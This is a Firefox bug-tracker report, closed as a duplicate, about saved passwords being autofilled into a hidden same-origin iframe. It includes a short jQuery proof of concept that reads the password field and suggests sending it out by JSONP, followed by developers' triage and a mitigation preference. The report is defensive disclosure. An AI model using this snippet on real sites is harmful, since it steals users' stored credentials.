steal the memorized password

RESOLVED DUPLICATE of bug 534541

Status

()

Firefox
Security
--
major
RESOLVED DUPLICATE of bug 534541
6 years ago
4 years ago

People

(Reporter: Jaroslav Olejnik, Unassigned)

Tracking

Trunk
x86
All
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

6 years ago
The vulnerability can steal the memorized password from the authorization form (common domain on a site with malicious code and on the site with the authorization form (same origin policy) ).

Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7
		  Windows XP SP3 Pro

//Example in jQuery:
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript"> 
$(document).ready(function(){
$('#frame').load(function(){
var pass = $('#frame').contents().find('input[name="password"]').val();
alert(pass); // (or send a crossdomain JSONP request)
});
}); 
</script>

Comment 1

6 years ago
I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!
Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.

We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.
Group: core-security
Whiteboard: DUPEME

Comment 3

6 years ago
Dupe for Bug 534541?
As per comment 3.

This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 4 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 534541

Updated

4 years ago
Whiteboard: DUPEME
You need to log in before you can comment on or make changes to this bug.